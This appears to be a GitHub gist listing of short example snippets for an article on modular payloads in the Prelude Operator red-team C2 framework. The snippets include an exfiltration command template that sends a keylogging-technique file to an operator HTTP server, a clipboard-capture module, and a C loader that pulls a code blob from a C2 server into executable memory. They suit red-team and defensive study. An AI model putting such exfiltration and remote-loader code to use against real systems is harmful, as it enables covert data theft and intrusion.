Alex Manners khyberspache

khyberspache / modular_command_args.yml
Created December 23, 2020 22:12
Example of argument passthrough to module for PneumaEX
command: |
  module.exfil.httpServer.["#{operator.http}", "#{file.T1056.001}", "#{agent.name}", "#{operator.session}"]
khyberspache / capabilities.go
Created December 23, 2020 22:11
Module capability definition file for PneumaEX
package main
import ()
var (
	ModuleName = "collect"
	Functions = map[string]func(args []string) ([]byte, int){
		"captureClipboard": captureClipboard,
	}
	ExecFunctions = map[string]func(args string) (){
khyberspache / payload_syntax.yml
Created December 23, 2020 22:10
Modular payloads syntax for Prelude Operator
#{operator.payloads}/path/to/payload/collect-windows.exe
#{operator.payloads}/path/to/payload/collect-linux
#{operator.payloads}/path/to/payload/collect-darwin
khyberspache / module_syntax.yml
Created December 23, 2020 22:09
Module syntax for ability yaml file
module.collect.captureClipboard
khyberspache / run_command.go
Created December 23, 2020 22:08
keyword usage example for Operator
func RunCommand(message string, executor string, payloadPath string) (string, int, int) {
	if executor == "keyword" {
		switch message {
		case "stop agent":
			os.Exit(0)
		case "module":
			// do module stuff
		default:
			// do other stuff
		}
khyberspache / pie_blob_loader.c
Created December 23, 2020 22:07
Position Independent Executable loader example for article
// Request the pie_blob module from the C2 server
// mmap executable memory
fptr = mmap(NULL, sb.st_size, PROT_READ | PROT_EXEC | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
// read the blob into memory
result = fread(fptr, 1, sb.st_size, pBlob);
// grab whatever libraries/symbols I want (or even better, just get pointers to dlsym/dlopen)
handle = dlopen(LIBC_FILE, RTLD_LAZY);
khyberspache / pie_blob.c
Created December 23, 2020 22:05
Position Independent Executable example for article
// example pie_blob.c
int f1(int v, void (* exit)(int)){
    (*exit)(0);
    return v;
}